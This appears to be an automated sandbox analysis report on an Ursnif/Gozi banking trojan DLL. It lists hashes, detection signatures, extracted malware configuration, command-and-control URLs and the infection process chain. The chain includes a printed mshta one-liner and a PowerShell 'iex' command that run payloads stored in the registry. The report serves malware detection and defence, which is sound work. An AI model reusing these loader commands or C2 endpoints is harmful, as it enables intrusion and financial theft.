Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Analysis ID: 351337
MD5: 4e62d8a29ba5805407ece642d63df461
SHA1: 320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256: ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
Tags: Gozi

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dat Avira URL Cloud: Label: phishing
Found malware configuration
Source: loaddll32.exe.6720.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8% Perma Link
Source: api3.lepini.at Virustotal: Detection: 10% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW, 1_2_6D921B50

Networking:

barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS GOOGLEUS
Source: global traffic HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 10 Feb 2021 14:15:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll String found in binary or memory: https://toldsend.com4

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1C22 GetProcAddress,NtCreateSection,memset, 1_2_6D8E1C22
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1252 GetLastError,NtClose, 1_2_6D8E1252
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1AD1 NtMapViewOfSection, 1_2_6D8E1AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E23C5 NtQueryVirtualMemory, 1_2_6D8E23C5
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E21A4 1_2_6D8E21A4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8FF610 1_2_6D8FF610
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D92BA90 1_2_6D92BA90
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Binary or memory string: OriginalFilenameGo.dllH& vs SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.troj.evad.winDLL@18/24@11/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.dat Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6E8265A0-F566-D0CB-EF82-F90493D63D78}
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SapiOneCoreServerStartingOrConnecting
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF051F935A0216EDA8.TMP Jump to behavior
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: unknown Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
